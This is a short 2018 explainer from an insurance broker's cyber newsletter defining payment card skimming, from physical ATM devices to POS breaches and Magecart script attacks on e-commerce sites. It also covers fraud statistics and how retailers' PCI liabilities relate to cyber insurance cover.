What does skimming mean?

05 October 2018

Skimming is the theft of payment card data, which is typically used by criminals to commit fraud. Criminals “skim” payment data directly from payment card machines or from the payment infrastructure at a merchant location or e-commerce site.

Historically, skimming would see criminals install a physical device at a merchant’s premises to harvest payment card data and transfer it to their own servers. The devices can be very sophisticated, small and difficult to discover. They are often hidden in credit card payment terminals, bank cash machines (ATMs) and self-service terminals, such as petrol pumps.

Over the years skimming has become more and more sophisticated and widespread. For example, criminals now also hack into networks in order to target point-ofsale (POS) systems, and are now attacking contactless payment systems. In 2013, hackers targeted the (POS) systems of US retailer Target and stole the card details of more than 40 million customers. A year later, Home Depot also fell victim to a POS attack, in which the personal data of 56 million customers was compromised.

According to the Payment Card Industry Security Standards Council (PCI), criminals skim because it is highly profitable. Perpetrators range from sophisticated and organised criminals leading complex and effective attacks, down to relatively unsophisticated criminals who use readily available, simple technology to steal cardholder data.

More recently, cyber criminals have been installing card skimming malware or code on e-commerce websites. The recent British Airways data breach is just the latest example of a targeted alleged skimming attack against a website. Cyber security researchers believe the attack against BA was carried out by a known skimming-gang, Magecart, who carried out a similar attack against Ticketmaster in June.

Another gang may have infiltrated more than 7,000 e-commerce sites in the past six months (20,000 since 2015), infecting them with malicious script designed to harvest customers’ payment card details, according to security consultant Willem de Groot. The scam targets one of the most widely used e-commerce software platforms, Magento.

Subscribe to our  Latest Cyber Decoder newsletter

Why does it matter?

Skimming is a major problem for banks, payment card companies and retailers, undermining confidence in the payment card system, as well as causing financial and reputational harm. The 2017 European ATM Crime Report found ATM related fraud attacks increased by 26%, up from 18,738 in 2015 to 23,588 in 2016. In the UK, skimming and ATM fraud cost some GBP 43 million in 2016, up 32%, according to Financial Fraud Action.

Banks and payment card firms typically look to recoup losses and the costs of reissuing cards from retailers following a large skimming attack. As a result, retailers face a sizable third party liability for any potential breach of Payment Card Industry (PCI) Data Security Standards, or where liability for such costs is written into contracts and ultimately passed on to the retailer. In some cases lenders will resort to litigation to recover such costs.

Off-the-shelf cyber insurance policies will often exclude cover for third party contractual liabilities (often referred to as PCI DSS assessments), as this is an exposure that insurers are hesitant to cover. However, some cyber policies do provide specific coverage for payment card industry losses, while others will add such cover via an endorsement.

Download Cyber Decoder

For further information, please contact Sarah Stephens, Head of Cyber, Content and New Technology Risks on cyber@jltgroup.com.